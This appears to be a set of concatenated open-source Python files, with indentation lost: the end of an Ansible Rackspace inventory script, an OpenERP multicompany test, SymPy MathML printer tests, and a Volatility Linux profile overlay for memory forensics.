creds_file = os.path.expanduser(creds_file)
else:
# But if that fails, use the default location of
# ~/.rackspace_cloud_credentials
if os.path.isfile(default_creds_file):
creds_file = default_creds_file
elif not keyring_username:
sys.exit('No value in environment variable %s and/or no '
'credentials file at %s'
% ('RAX_CREDS_FILE', default_creds_file))
identity_type = pyrax.get_setting('identity_type')
pyrax.set_setting('identity_type', identity_type or 'rackspace')
region = pyrax.get_setting('region')
try:
if keyring_username:
pyrax.keyring_auth(keyring_username, region=region)
else:
pyrax.set_credential_file(creds_file, region=region)
except Exception as e:
sys.exit("%s: %s" % (e, e.message))
regions = []
if region:
regions.append(region)
else:
try:
# Ansible 2.3+
region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
value_type='list')
except TypeError:
# Ansible 2.2.x and below
region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
islist=True)
for region in region_list:
region = region.strip().upper()
if region == 'ALL':
regions = pyrax.regions
break
elif region not in pyrax.regions:
sys.exit('Unsupported region %s' % region)
elif region not in regions:
regions.append(region)
return regions
def main():
args = parse_args()
regions = setup()
if args.list:
_list(regions, refresh_cache=args.refresh_cache)
elif args.host:
host(regions, args.host)
sys.exit(0)
if __name__ == '__main__':
main()
| gpl-3.0 |
patriciolobos/desa8 | openerp/addons/mrp/tests/test_multicompany.py | 374 | 2660 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.tests import common
class TestMrpMulticompany(common.TransactionCase):
def setUp(self):
super(TestMrpMulticompany, self).setUp()
cr, uid = self.cr, self.uid
# Usefull models
self.ir_model_data = self.registry('ir.model.data')
self.res_users = self.registry('res.users')
self.stock_location = self.registry('stock.location')
group_user_id = self.registry('ir.model.data').xmlid_to_res_id(cr, uid, 'base.group_user')
group_stock_manager_id = self.registry('ir.model.data').xmlid_to_res_id(cr, uid, 'stock.group_stock_manager')
company_2_id = self.registry('ir.model.data').xmlid_to_res_id(cr, uid, 'stock.res_company_1')
self.multicompany_user_id = self.res_users.create(cr, uid,
{'name': 'multicomp', 'login': 'multicomp',
'groups_id': [(6, 0, [group_user_id, group_stock_manager_id])],
'company_id': company_2_id, 'company_ids': [(6,0,[company_2_id])]})
def test_00_multicompany_user(self):
"""check no error on getting default mrp.production values in multicompany setting"""
cr, uid, context = self.cr, self.multicompany_user_id, {}
fields = ['location_src_id', 'location_dest_id']
defaults = self.stock_location.default_get(cr, uid, ['location_id', 'location_dest_id', 'type'], context)
for field in fields:
if defaults.get(field):
try:
self.stock_location.check_access_rule(cr, uid, [defaults[field]], 'read', context)
except Exception, exc:
assert False, "unreadable location %s: %s" % (field, exc)
| agpl-3.0 |
jerli/sympy | sympy/printing/tests/test_mathml.py | 62 | 16917 | from sympy import diff, Integral, Limit, sin, Symbol, Integer, Rational, cos, \
tan, asin, acos, atan, sinh, cosh, tanh, asinh, acosh, atanh, E, I, oo, \
pi, GoldenRatio, EulerGamma, Sum, Eq, Ne, Ge, Lt, Float
from sympy.core.compatibility import u
from sympy.printing.mathml import mathml, MathMLPrinter
from sympy.utilities.pytest import raises
x = Symbol('x')
y = Symbol('y')
mp = MathMLPrinter()
def test_printmethod():
assert mp.doprint(1 + x) == '<apply><plus/><ci>x</ci><cn>1</cn></apply>'
def test_mathml_core():
mml_1 = mp._print(1 + x)
assert mml_1.nodeName == 'apply'
nodes = mml_1.childNodes
assert len(nodes) == 3
assert nodes[0].nodeName == 'plus'
assert nodes[0].hasChildNodes() is False
assert nodes[0].nodeValue is None
assert nodes[1].nodeName in ['cn', 'ci']
if nodes[1].nodeName == 'cn':
assert nodes[1].childNodes[0].nodeValue == '1'
assert nodes[2].childNodes[0].nodeValue == 'x'
else:
assert nodes[1].childNodes[0].nodeValue == 'x'
assert nodes[2].childNodes[0].nodeValue == '1'
mml_2 = mp._print(x**2)
assert mml_2.nodeName == 'apply'
nodes = mml_2.childNodes
assert nodes[1].childNodes[0].nodeValue == 'x'
assert nodes[2].childNodes[0].nodeValue == '2'
mml_3 = mp._print(2*x)
assert mml_3.nodeName == 'apply'
nodes = mml_3.childNodes
assert nodes[0].nodeName == 'times'
assert nodes[1].childNodes[0].nodeValue == '2'
assert nodes[2].childNodes[0].nodeValue == 'x'
mml = mp._print(Float(1.0, 2)*x)
assert mml.nodeName == 'apply'
nodes = mml.childNodes
assert nodes[0].nodeName == 'times'
assert nodes[1].childNodes[0].nodeValue == '1.0'
assert nodes[2].childNodes[0].nodeValue == 'x'
def test_mathml_functions():
mml_1 = mp._print(sin(x))
assert mml_1.nodeName == 'apply'
assert mml_1.childNodes[0].nodeName == 'sin'
assert mml_1.childNodes[1].nodeName == 'ci'
mml_2 = mp._print(diff(sin(x), x, evaluate=False))
assert mml_2.nodeName == 'apply'
assert mml_2.childNodes[0].nodeName == 'diff'
assert mml_2.childNodes[1].nodeName == 'bvar'
assert mml_2.childNodes[1].childNodes[
0].nodeName == 'ci' # below bvar there's <ci>x/ci>
mml_3 = mp._print(diff(cos(x*y), x, evaluate=False))
assert mml_3.nodeName == 'apply'
assert mml_3.childNodes[0].nodeName == 'partialdiff'
assert mml_3.childNodes[1].nodeName == 'bvar'
assert mml_3.childNodes[1].childNodes[
0].nodeName == 'ci' # below bvar there's <ci>x/ci>
def test_mathml_limits():
# XXX No unevaluated limits
lim_fun = sin(x)/x
mml_1 = mp._print(Limit(lim_fun, x, 0))
assert mml_1.childNodes[0].nodeName == 'limit'
assert mml_1.childNodes[1].nodeName == 'bvar'
assert mml_1.childNodes[2].nodeName == 'lowlimit'
assert mml_1.childNodes[3].toxml() == mp._print(lim_fun).toxml()
def test_mathml_integrals():
integrand = x
mml_1 = mp._print(Integral(integrand, (x, 0, 1)))
assert mml_1.childNodes[0].nodeName == 'int'
assert mml_1.childNodes[1].nodeName == 'bvar'
assert mml_1.childNodes[2].nodeName == 'lowlimit'
assert mml_1.childNodes[3].nodeName == 'uplimit'
assert mml_1.childNodes[4].toxml() == mp._print(integrand).toxml()
def test_mathml_sums():
summand = x
mml_1 = mp._print(Sum(summand, (x, 1, 10)))
assert mml_1.childNodes[0].nodeName == 'sum'
assert mml_1.childNodes[1].nodeName == 'bvar'
assert mml_1.childNodes[2].nodeName == 'lowlimit'
assert mml_1.childNodes[3].nodeName == 'uplimit'
assert mml_1.childNodes[4].toxml() == mp._print(summand).toxml()
def test_mathml_tuples():
mml_1 = mp._print([2])
assert mml_1.nodeName == 'list'
assert mml_1.childNodes[0].nodeName == 'cn'
assert len(mml_1.childNodes) == 1
mml_2 = mp._print([2, Integer(1)])
assert mml_2.nodeName == 'list'
assert mml_2.childNodes[0].nodeName == 'cn'
assert mml_2.childNodes[1].nodeName == 'cn'
assert len(mml_2.childNodes) == 2
def test_mathml_add():
mml = mp._print(x**5 - x**4 + x)
assert mml.childNodes[0].nodeName == 'plus'
assert mml.childNodes[1].childNodes[0].nodeName == 'minus'
assert mml.childNodes[1].childNodes[1].nodeName == 'apply'
def test_mathml_Rational():
mml_1 = mp._print(Rational(1, 1))
"""should just return a number"""
assert mml_1.nodeName == 'cn'
mml_2 = mp._print(Rational(2, 5))
assert mml_2.childNodes[0].nodeName == 'divide'
def test_mathml_constants():
mml = mp._print(I)
assert mml.nodeName == 'imaginaryi'
mml = mp._print(E)
assert mml.nodeName == 'exponentiale'
mml = mp._print(oo)
assert mml.nodeName == 'infinity'
mml = mp._print(pi)
assert mml.nodeName == 'pi'
assert mathml(GoldenRatio) == '<cn>φ</cn>'
mml = mathml(EulerGamma)
assert mml == '<eulergamma/>'
def test_mathml_trig():
mml = mp._print(sin(x))
assert mml.childNodes[0].nodeName == 'sin'
mml = mp._print(cos(x))
assert mml.childNodes[0].nodeName == 'cos'
mml = mp._print(tan(x))
assert mml.childNodes[0].nodeName == 'tan'
mml = mp._print(asin(x))
assert mml.childNodes[0].nodeName == 'arcsin'
mml = mp._print(acos(x))
assert mml.childNodes[0].nodeName == 'arccos'
mml = mp._print(atan(x))
assert mml.childNodes[0].nodeName == 'arctan'
mml = mp._print(sinh(x))
assert mml.childNodes[0].nodeName == 'sinh'
mml = mp._print(cosh(x))
assert mml.childNodes[0].nodeName == 'cosh'
mml = mp._print(tanh(x))
assert mml.childNodes[0].nodeName == 'tanh'
mml = mp._print(asinh(x))
assert mml.childNodes[0].nodeName == 'arcsinh'
mml = mp._print(atanh(x))
assert mml.childNodes[0].nodeName == 'arctanh'
mml = mp._print(acosh(x))
assert mml.childNodes[0].nodeName == 'arccosh'
def test_mathml_relational():
mml_1 = mp._print(Eq(x, 1))
assert mml_1.nodeName == 'apply'
assert mml_1.childNodes[0].nodeName == 'eq'
assert mml_1.childNodes[1].nodeName == 'ci'
assert mml_1.childNodes[1].childNodes[0].nodeValue == 'x'
assert mml_1.childNodes[2].nodeName == 'cn'
assert mml_1.childNodes[2].childNodes[0].nodeValue == '1'
mml_2 = mp._print(Ne(1, x))
assert mml_2.nodeName == 'apply'
assert mml_2.childNodes[0].nodeName == 'neq'
assert mml_2.childNodes[1].nodeName == 'cn'
assert mml_2.childNodes[1].childNodes[0].nodeValue == '1'
assert mml_2.childNodes[2].nodeName == 'ci'
assert mml_2.childNodes[2].childNodes[0].nodeValue == 'x'
mml_3 = mp._print(Ge(1, x))
assert mml_3.nodeName == 'apply'
assert mml_3.childNodes[0].nodeName == 'geq'
assert mml_3.childNodes[1].nodeName == 'cn'
assert mml_3.childNodes[1].childNodes[0].nodeValue == '1'
assert mml_3.childNodes[2].nodeName == 'ci'
assert mml_3.childNodes[2].childNodes[0].nodeValue == 'x'
mml_4 = mp._print(Lt(1, x))
assert mml_4.nodeName == 'apply'
assert mml_4.childNodes[0].nodeName == 'lt'
assert mml_4.childNodes[1].nodeName == 'cn'
assert mml_4.childNodes[1].childNodes[0].nodeValue == '1'
assert mml_4.childNodes[2].nodeName == 'ci'
assert mml_4.childNodes[2].childNodes[0].nodeValue == 'x'
def test_symbol():
mml = mp._print(Symbol("x"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeValue == 'x'
del mml
mml = mp._print(Symbol("x^2"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msup'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeValue == '2'
del mml
mml = mp._print(Symbol("x__2"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msup'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeValue == '2'
del mml
mml = mp._print(Symbol("x_2"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msub'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeValue == '2'
del mml
mml = mp._print(Symbol("x^3_2"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msubsup'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeValue == '2'
assert mml.childNodes[0].childNodes[2].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[2].childNodes[0].nodeValue == '3'
del mml
mml = mp._print(Symbol("x__3_2"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msubsup'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeValue == '2'
assert mml.childNodes[0].childNodes[2].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[2].childNodes[0].nodeValue == '3'
del mml
mml = mp._print(Symbol("x_2_a"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msub'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mrow'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].childNodes[
0].nodeValue == '2'
assert mml.childNodes[0].childNodes[1].childNodes[1].nodeName == 'mml:mo'
assert mml.childNodes[0].childNodes[1].childNodes[1].childNodes[
0].nodeValue == ' '
assert mml.childNodes[0].childNodes[1].childNodes[2].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[2].childNodes[
0].nodeValue == 'a'
del mml
mml = mp._print(Symbol("x^2^a"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msup'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mrow'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].childNodes[
0].nodeValue == '2'
assert mml.childNodes[0].childNodes[1].childNodes[1].nodeName == 'mml:mo'
assert mml.childNodes[0].childNodes[1].childNodes[1].childNodes[
0].nodeValue == ' '
assert mml.childNodes[0].childNodes[1].childNodes[2].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[2].childNodes[
0].nodeValue == 'a'
del mml
mml = mp._print(Symbol("x__2__a"))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeName == 'mml:msup'
assert mml.childNodes[0].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[0].childNodes[0].nodeValue == 'x'
assert mml.childNodes[0].childNodes[1].nodeName == 'mml:mrow'
assert mml.childNodes[0].childNodes[1].childNodes[0].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[0].childNodes[
0].nodeValue == '2'
assert mml.childNodes[0].childNodes[1].childNodes[1].nodeName == 'mml:mo'
assert mml.childNodes[0].childNodes[1].childNodes[1].childNodes[
0].nodeValue == ' '
assert mml.childNodes[0].childNodes[1].childNodes[2].nodeName == 'mml:mi'
assert mml.childNodes[0].childNodes[1].childNodes[2].childNodes[
0].nodeValue == 'a'
del mml
def test_mathml_greek():
mml = mp._print(Symbol('alpha'))
assert mml.nodeName == 'ci'
assert mml.childNodes[0].nodeValue == u('\N{GREEK SMALL LETTER ALPHA}')
assert mp.doprint(Symbol('alpha')) == '<ci>α</ci>'
assert mp.doprint(Symbol('beta')) == '<ci>β</ci>'
assert mp.doprint(Symbol('gamma')) == '<ci>γ</ci>'
assert mp.doprint(Symbol('delta')) == '<ci>δ</ci>'
assert mp.doprint(Symbol('epsilon')) == '<ci>ε</ci>'
assert mp.doprint(Symbol('zeta')) == '<ci>ζ</ci>'
assert mp.doprint(Symbol('eta')) == '<ci>η</ci>'
assert mp.doprint(Symbol('theta')) == '<ci>θ</ci>'
assert mp.doprint(Symbol('iota')) == '<ci>ι</ci>'
assert mp.doprint(Symbol('kappa')) == '<ci>κ</ci>'
assert mp.doprint(Symbol('lambda')) == '<ci>λ</ci>'
assert mp.doprint(Symbol('mu')) == '<ci>μ</ci>'
assert mp.doprint(Symbol('nu')) == '<ci>ν</ci>'
assert mp.doprint(Symbol('xi')) == '<ci>ξ</ci>'
assert mp.doprint(Symbol('omicron')) == '<ci>ο</ci>'
assert mp.doprint(Symbol('pi')) == '<ci>π</ci>'
assert mp.doprint(Symbol('rho')) == '<ci>ρ</ci>'
assert mp.doprint(Symbol('varsigma')) == '<ci>ς</ci>', mp.doprint(Symbol('varsigma'))
assert mp.doprint(Symbol('sigma')) == '<ci>σ</ci>'
assert mp.doprint(Symbol('tau')) == '<ci>τ</ci>'
assert mp.doprint(Symbol('upsilon')) == '<ci>υ</ci>'
assert mp.doprint(Symbol('phi')) == '<ci>φ</ci>'
assert mp.doprint(Symbol('chi')) == '<ci>χ</ci>'
assert mp.doprint(Symbol('psi')) == '<ci>ψ</ci>'
assert mp.doprint(Symbol('omega')) == '<ci>ω</ci>'
assert mp.doprint(Symbol('Alpha')) == '<ci>Α</ci>'
assert mp.doprint(Symbol('Beta')) == '<ci>Β</ci>'
assert mp.doprint(Symbol('Gamma')) == '<ci>Γ</ci>'
assert mp.doprint(Symbol('Delta')) == '<ci>Δ</ci>'
assert mp.doprint(Symbol('Epsilon')) == '<ci>Ε</ci>'
assert mp.doprint(Symbol('Zeta')) == '<ci>Ζ</ci>'
assert mp.doprint(Symbol('Eta')) == '<ci>Η</ci>'
assert mp.doprint(Symbol('Theta')) == '<ci>Θ</ci>'
assert mp.doprint(Symbol('Iota')) == '<ci>Ι</ci>'
assert mp.doprint(Symbol('Kappa')) == '<ci>Κ</ci>'
assert mp.doprint(Symbol('Lambda')) == '<ci>Λ</ci>'
assert mp.doprint(Symbol('Mu')) == '<ci>Μ</ci>'
assert mp.doprint(Symbol('Nu')) == '<ci>Ν</ci>'
assert mp.doprint(Symbol('Xi')) == '<ci>Ξ</ci>'
assert mp.doprint(Symbol('Omicron')) == '<ci>Ο</ci>'
assert mp.doprint(Symbol('Pi')) == '<ci>Π</ci>'
assert mp.doprint(Symbol('Rho')) == '<ci>Ρ</ci>'
assert mp.doprint(Symbol('Sigma')) == '<ci>Σ</ci>'
assert mp.doprint(Symbol('Tau')) == '<ci>Τ</ci>'
assert mp.doprint(Symbol('Upsilon')) == '<ci>Υ</ci>'
assert mp.doprint(Symbol('Phi')) == '<ci>Φ</ci>'
assert mp.doprint(Symbol('Chi')) == '<ci>Χ</ci>'
assert mp.doprint(Symbol('Psi')) == '<ci>Ψ</ci>'
assert mp.doprint(Symbol('Omega')) == '<ci>Ω</ci>'
def test_mathml_order():
expr = x**3 + x**2*y + 3*x*y**3 + y**4
mp = MathMLPrinter({'order': 'lex'})
mml = mp._print(expr)
assert mml.childNodes[1].childNodes[0].nodeName == 'power'
assert mml.childNodes[1].childNodes[1].childNodes[0].data == 'x'
assert mml.childNodes[1].childNodes[2].childNodes[0].data == '3'
assert mml.childNodes[4].childNodes[0].nodeName == 'power'
assert mml.childNodes[4].childNodes[1].childNodes[0].data == 'y'
assert mml.childNodes[4].childNodes[2].childNodes[0].data == '4'
mp = MathMLPrinter({'order': 'rev-lex'})
mml = mp._print(expr)
assert mml.childNodes[1].childNodes[0].nodeName == 'power'
assert mml.childNodes[1].childNodes[1].childNodes[0].data == 'y'
assert mml.childNodes[1].childNodes[2].childNodes[0].data == '4'
assert mml.childNodes[4].childNodes[0].nodeName == 'power'
assert mml.childNodes[4].childNodes[1].childNodes[0].data == 'x'
assert mml.childNodes[4].childNodes[2].childNodes[0].data == '3'
def test_settings():
raises(TypeError, lambda: mathml(Symbol("x"), method="garbage"))
def test_toprettyxml_hooking():
# test that the patch doesn't influence the behavior of the standard library
import xml.dom.minidom
doc = xml.dom.minidom.parseString(
"<apply><plus/><ci>x</ci><cn>1</cn></apply>")
prettyxml_old = doc.toprettyxml()
mp.apply_patch()
mp.restore_patch()
assert prettyxml_old == doc.toprettyxml()
| bsd-3-clause |
Alwnikrotikz/volatility | volatility/plugins/overlays/linux/linux.py | 44 | 37298 | # Volatility
# Copyright (C) 2010 Brendan Dolan-Gavitt
# Copyright (c) 2011 Michael Cohen <scudette@gmail.com>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0
@contact: brendandg@gatech.edu
@organization: Georgia Institute of Technology
"""
import os, struct, socket
import copy
import zipfile
import volatility.plugins
import volatility.plugins.overlays.basic as basic
import volatility.plugins.overlays.native_types as native_types
import volatility.exceptions as exceptions
import volatility.obj as obj
import volatility.debug as debug
import volatility.dwarf as dwarf
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.flags as linux_flags
import volatility.addrspace as addrspace
import volatility.utils as utils
import volatility.protos as protos
x64_native_types = copy.deepcopy(native_types.x64_native_types)
x64_native_types['long'] = [8, '<q']
x64_native_types['unsigned long'] = [8, '<Q']
class LinuxPermissionFlags(basic.Flags):
"""A Flags object for printing vm_area_struct permissions
in a format like rwx or r-x"""
def __str__(self):
result = []
value = self.v()
keys = self.bitmap.keys()
keys.sort()
for k in keys:
if value & (1 << self.bitmap[k]):
result.append(k)
else:
result.append('-')
return ''.join(result)
def is_flag(self, flag):
return self.v() & (1 << self.bitmap[flag])
def is_executable(self):
return self.is_flag('x')
def is_readable(self):
return self.is_flag('r')
def is_writable(self):
return self.is_flag('w')
linux_overlay = {
'task_struct' : [None, {
'comm' : [ None , ['String', dict(length = 16)]],
}],
'in_ifaddr' : [None, {
'ifa_label' : [ None , ['String', dict(length = 16)]],
}],
'module' : [None, {
'name' : [ None , ['String', dict(length = 60)]],
}],
'super_block' : [None, {
's_id' : [ None , ['String', dict(length = 32)]],
}],
'net_device' : [None, {
'name' : [ None , ['String', dict(length = 16)]],
}],
'sockaddr_un' : [None, {
'sun_path' : [ None , ['String', dict(length = 108)]],
}],
'hlist_head' : [None, {
'first' : [ None , ['pointer', ['hlist_node']]],
}],
'tty_struct' : [None, {
'name' : [ None , ['String', dict(length = 64)]],
}],
'dentry' : [None, {
'd_u' : [ None , ['list_head', {}]],
}],
'VOLATILITY_MAGIC': [None, {
'DTB' : [ 0x0, ['VolatilityDTB', dict(configname = "DTB")]],
'ArmValidAS' : [ 0x0, ['VolatilityLinuxARMValidAS']],
'IA32ValidAS' : [ 0x0, ['VolatilityLinuxIntelValidAS']],
'AMD64ValidAS' : [ 0x0, ['VolatilityLinuxIntelValidAS']],
}],
'vm_area_struct' : [ None, {
'vm_flags' : [ None, ['LinuxPermissionFlags', {'bitmap': {'r': 0, 'w': 1, 'x': 2}}]],
'vm_end' : [ None , ['unsigned long']],
'vm_start' : [ None , ['unsigned long']],
}],
}
intel_overlay = {
'cpuinfo_x86' : [None, {
'x86_model_id' : [ None , ['String', dict(length = 64)]],
'x86_vendor_id' : [ None, ['String', dict(length = 16)]],
}],
}
def parse_system_map(data, module):
"""Parse the symbol file."""
sys_map = {}
sys_map[module] = {}
mem_model = None
arch = "x86"
# get the system map
for line in data.splitlines():
try:
(str_addr, symbol_type, symbol) = line.strip().split()
except ValueError:
continue
try:
sym_addr = long(str_addr, 16)
except ValueError:
continue
if symbol == "arm_syscall":
arch = "ARM"
if not symbol in sys_map[module]:
sys_map[module][symbol] = []
sys_map[module][symbol].append([sym_addr, symbol_type])
mem_model = str(len(str_addr) * 4) + "bit"
if mem_model == "64bit" and arch == "x86":
arch = "x64"
return arch, mem_model, sys_map
def LinuxProfileFactory(profpkg):
""" Takes in a zip file, spits out a LinuxProfile class
The zipfile should include at least one .dwarf file
and the appropriate system.map file.
To generate a suitable dwarf file:
dwarfdump -di vmlinux > output.dwarf
"""
dwarfdata = None
sysmapdata = None
# XXX Do we want to initialize this
memmodel, arch = "32bit", "x86"
profilename = os.path.splitext(os.path.basename(profpkg.filename))[0]
for f in profpkg.filelist:
if f.filename.lower().endswith('.dwarf'):
dwarfdata = profpkg.read(f.filename)
elif 'system.map' in f.filename.lower():
sysmapdata = profpkg.read(f.filename)
arch, memmodel, sysmap = parse_system_map(profpkg.read(f.filename), "kernel")
if memmodel == "64bit":
arch = "x64"
if not sysmapdata or not dwarfdata:
# Might be worth throwing an exception here?
return None
class AbstractLinuxProfile(obj.Profile):
__doc__ = "A Profile for Linux " + profilename + " " + arch
_md_os = "linux"
_md_memory_model = memmodel
_md_arch = arch
# Override 64-bit native_types
native_mapping = {'32bit': native_types.x86_native_types,
'64bit': x64_native_types}
def __init__(self, *args, **kwargs):
# change the name to catch any code referencing the old hash table
self.sys_map = {}
obj.Profile.__init__(self, *args, **kwargs)
def clear(self):
"""Clear out the system map, and everything else"""
self.sys_map = {}
obj.Profile.clear(self)
def reset(self):
"""Reset the vtypes, sysmap and apply modifications, then compile"""
self.clear()
self.load_vtypes()
self.load_sysmap()
self.load_modifications()
self.compile()
def _merge_anonymous_members(self, vtypesvar):
members_index = 1
types_index = 1
offset_index = 0
try:
for candidate in vtypesvar:
done = False
while not done:
if any(member.startswith('__unnamed_') for member in vtypesvar[candidate][members_index]):
for member in vtypesvar[candidate][members_index].keys():
if member.startswith('__unnamed_'):
member_type = vtypesvar[candidate][members_index][member][types_index][0]
location = vtypesvar[candidate][members_index][member][offset_index]
vtypesvar[candidate][members_index].update(vtypesvar[member_type][members_index])
for name in vtypesvar[member_type][members_index].keys():
vtypesvar[candidate][members_index][name][offset_index] += location
del vtypesvar[candidate][members_index][member]
# Don't update done because we'll need to check if any
# of the newly imported types need merging
else:
done = True
except KeyError, e:
import pdb
pdb.set_trace()
raise exceptions.VolatilityException("Inconsistent linux profile - unable to look up " + str(e))
def load_vtypes(self):
"""Loads up the vtypes data"""
ntvar = self.metadata.get('memory_model', '32bit')
self.native_types = copy.deepcopy(self.native_mapping.get(ntvar))
vtypesvar = dwarf.DWARFParser(dwarfdata).finalize()
self._merge_anonymous_members(vtypesvar)
self.vtypes.update(vtypesvar)
debug.debug("{2}: Found dwarf file {0} with {1} symbols".format(f.filename, len(vtypesvar.keys()), profilename))
def load_sysmap(self):
"""Loads up the system map data"""
arch, _memmodel, sysmapvar = parse_system_map(sysmapdata, "kernel")
debug.debug("{2}: Found system file {0} with {1} symbols".format(f.filename, len(sysmapvar.keys()), profilename))
self.sys_map.update(sysmapvar)
def get_all_symbols(self, module = "kernel"):
""" Gets all the symbol tuples for the given module """
ret = []
symtable = self.sys_map
if module in symtable:
mod = symtable[module]
for (name, addrs) in mod.items():
ret.append(addrs)
else:
debug.info("All symbols requested for non-existent module %s" % module)
return ret
def get_all_addresses(self, module = "kernel"):
""" Gets all the symbol addresses for the given module """
# returns a hash table for quick looks
# the main use of this function is to see if an address is known
ret = {}
symbols = self.get_all_symbols(module)
for sym in symbols:
for (addr, addrtype) in sym:
ret[addr] = 1
return ret
def get_symbol_by_address(self, module, sym_address):
ret = ""
symtable = self.sys_map
mod = symtable[module]
for (name, addrs) in mod.items():
for (addr, addr_type) in addrs:
if sym_address == addr:
ret = name
break
return ret
def get_all_symbol_names(self, module = "kernel"):
symtable = self.sys_map
if module in symtable:
ret = symtable[module].keys()
else:
debug.error("get_all_symbol_names called on non-existent module")
return ret
def get_next_symbol_address(self, sym_name, module = "kernel"):
"""
This is used to find the address of the next symbol in the profile
For some data structures, we cannot determine their size automaticlaly so this
can be used to figure it out on the fly
"""
high_addr = 0xffffffffffffffff
table_addr = self.get_symbol(sym_name, module = module)
addrs = self.get_all_addresses(module = module)
for addr in addrs.keys():
if table_addr < addr < high_addr:
high_addr = addr
return high_addr
def get_symbol(self, sym_name, nm_type = "", module = "kernel"):
"""Gets a symbol out of the profile
sym_name -> name of the symbol
nm_tyes -> types as defined by 'nm' (man nm for examples)
module -> which module to get the symbol from, default is kernel, otherwise can be any name seen in 'lsmod'
This fixes a few issues from the old static hash table method:
1) Conflicting symbols can be handled, if a symbol is found to conflict on any profile,
then the plugin will need to provide the nm_type to differentiate, otherwise the plugin will be errored out
2) Can handle symbols gathered from modules on disk as well from the static kernel
symtable is stored as a hash table of:
symtable[module][sym_name] = [(symbol address, symbol type), (symbol addres, symbol type), ...]
The function has overly verbose error checking on purpose...
"""
symtable = self.sys_map
ret = None
# check if the module is there...
if module in symtable:
mod = symtable[module]
# check if the requested symbol is in the module
if sym_name in mod:
sym_list = mod[sym_name]
# if a symbol has multiple definitions, then the plugin needs to specify the type
if len(sym_list) > 1:
if nm_type == "":
debug.error("Requested symbol {0:s} in module {1:s} has multiple definitions and no type given\n".format(sym_name, module))
else:
for (addr, stype) in sym_list:
if stype == nm_type:
ret = addr
break
if ret == None:
debug.error("Requested symbol {0:s} in module {1:s} could not be found\n".format(sym_name, module))
else:
# get the address of the symbol
ret = sym_list[0][0]
else:
debug.debug("Requested symbol {0:s} not found in module {1:s}\n".format(sym_name, module))
else:
debug.info("Requested module {0:s} not found in symbol table\n".format(module))
return ret
cls = AbstractLinuxProfile
cls.__name__ = 'Linux' + profilename.replace('.', '_') + arch
return cls
################################
# Track down the zip files
# Push them through the factory
# Check whether ProfileModifications will work
new_classes = []
